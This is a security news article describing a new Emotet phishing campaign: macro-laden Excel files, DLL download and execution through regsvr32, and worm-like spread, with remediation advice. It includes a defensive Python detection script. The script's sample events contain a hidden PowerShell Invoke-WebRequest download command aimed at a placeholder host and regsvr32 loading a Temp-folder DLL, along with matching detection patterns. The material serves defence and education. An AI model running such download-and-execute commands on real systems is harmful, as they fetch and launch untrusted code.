The most famous botnet complicit in cyber crime returns. It targets many organizations with a ZIP attachment containing an Excel file with a malicious macro.

Emotet is back with a new campaign that targets organizations with emails carrying a password-protected ZIP archive; the archive contains an Excel file with a malicious macro.
The infection chain of the malware, which spreads via phishing, is unchanged: the macro holds four drop URLs, partially readable directly in the XLS file, from which it downloads the 64-bit Emotet DLL and executes it with the regsvr32 command.

The malware spreads through weaponized Excel or Word documents sent via e-mail using phishing techniques.

How does Emotet work?

The user is tricked into opening documents that in turn activate macros, resulting in the download of the Emotet DLL file and its loading into memory. From here, the malware begins its operations, which are the search and theft of e-mails to be used in subsequent spam campaigns.

Its main goal is to gain access to other people's devices and spy on sensitive private data, while evading basic antivirus software.
Once the target systems are infected, the malware spreads like a worm, trying to infiltrate other systems in the target network.

Emotet malware targets companies, organizations, and authorities. It is also estimated that many companies infected with the malware have not reported the breach for fear of damaging their reputation.

Emotet is spread primarily through e-mail. The trojan reads emails from already infected users and creates fictitious, deceptive content. At first glance these emails appear legitimate and personal, not like spam. Emotet then sends these phishing emails to the victim's saved contacts, such as co-workers.

Emotet characteristics

Most of the time, the emails contain an infected .doc file for the recipient to download or a dangerous link. The correct name is always displayed as the sender, leading recipients to believe that the message is legitimate, so the malicious file is downloaded and executed.

Often the malware uses macros to launch a scripting engine such as cscript, wscript, or another script interpreter. In addition, PowerShell, WMI or other Windows administrative utilities have also been used in this context. Endpoint Detection and Response (EDR) solutions usually monitor these parent-child process relationships and raise an alert when Office documents attempt to run nonstandard programs.

The decoded script contains a list of URLs where the Emotet payload is hosted. Once executed, it iterates through the list and makes a request with the PowerShell Invoke-WebRequest cmdlet. If the binary is successfully downloaded, it saves the file in the Windows temporary directory and executes it using regsvr32.exe.
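As an added illustration of the parent-child monitoring described in the two previous paragraphs (this is example code written for this page, not code from the original article or from any EDR product), the following Python triage function flags an Office application spawning a script host, PowerShell or regsvr32, a PowerShell download cradle, and regsvr32 loading a DLL from a Temp directory. The events are constructed Sysmon-style process-creation records; the field names ParentImage, Image and CommandLine follow Sysmon Event ID 1, and every path and DLL name is made up.

```python
import re

# Office binaries whose child processes deserve scrutiny.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children named in the article: scripting engines, PowerShell, WMI, regsvr32.
SUSPICIOUS_CHILDREN = {"cscript.exe", "wscript.exe", "powershell.exe",
                       "wmic.exe", "regsvr32.exe"}
# A DLL path living under any ...\Temp\ directory (case-insensitive).
TEMP_DLL = re.compile(r'\\temp\\[^\s"]+\.dll\b', re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b", re.IGNORECASE)

def basename(path):
    """Lower-case file name of a Windows path (handles / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of rule names an event matches (empty list = benign)."""
    hits = []
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmdline = event.get("CommandLine", "")
    if parent in OFFICE_APPS and child in SUSPICIOUS_CHILDREN:
        hits.append("office_spawns_script_host")
    if child == "regsvr32.exe" and TEMP_DLL.search(cmdline):
        hits.append("regsvr32_loads_temp_dll")
    if child == "powershell.exe" and DOWNLOAD_CRADLE.search(cmdline):
        hits.append("powershell_download_cradle")
    return hits

def triage(events):
    """Map event index -> matched rules, keeping only flagged events."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}

# Constructed sample events (Sysmon Event ID 1 field names); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\alice\AppData\Local\Temp\ksjd.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c Invoke-WebRequest http://example.invalid/a"},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: user opens a sheet
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xls'},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",  # benign: installer registers a DLL
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
]

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(hits)}")
```

The two benign events show why both the parent and the command line matter: regsvr32 alone is routine, but regsvr32 launched by Excel against a DLL in Temp is the chain the article describes.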

To protect against the malware, isolate the affected device from the network as soon as possible to reduce the risk of it spreading further.
Because Emotet is polymorphic, a system that is not yet infected can quickly be infected again once it is reconnected to a compromised network. It is therefore worthwhile to clean up all devices connected to the network in order to limit the spread of the malware within it.